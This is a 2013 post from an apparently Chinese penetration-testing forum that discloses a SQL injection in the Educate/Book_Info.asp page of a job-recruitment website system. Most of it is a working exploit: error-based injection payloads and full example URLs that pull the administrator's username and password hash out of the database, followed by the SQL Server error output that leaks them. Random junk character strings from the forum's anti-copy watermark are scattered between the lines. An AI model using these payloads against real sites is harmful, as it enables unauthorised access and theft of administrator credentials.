中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
/ l( ?* g& A0 @7 s2 s) ]
$ l) A- E9 y# ~2 i( b) P
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 E* @3 T# q( J! z. p
3 d8 R! L% r% g
exp:如下
. Q) J9 v7 f' K* O9 D7 H' Y; ~
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% I8 s" }9 c i- W3 v; l: @& \
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! ^: Y6 S, [: K
& b6 p' r' C C$ k1 o; R( N$ s
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 l( P: h a' g: h o+ l
3 @: f6 O+ b+ l0 L
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
: T$ F* b! V! i7 x' J
4 F2 _2 ?1 C0 C$ _' O( m
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 G) n& ?# J9 t* o
* \7 |" {+ j9 w: D7 [/ Y. ^
/Educate/Book_Info.asp,行 8
( J# `) A( L' a1 [( O
A5 R! ?7 G, g; m; y: Y# M
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& R. F$ J+ Q( F* C* |
/ Y }. D. P6 k% \4 V$ V
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
6 R2 c/ {$ ^# L" J$ M- V" X
5 b" q8 q" n" x$ a
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
: k; Y/ Q) V& j% v: s" r. D
% U8 w: r+ y$ b7 j( [: t/ h
/Educate/Book_Info.asp,行 8
8 T6 X. P# S" ]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2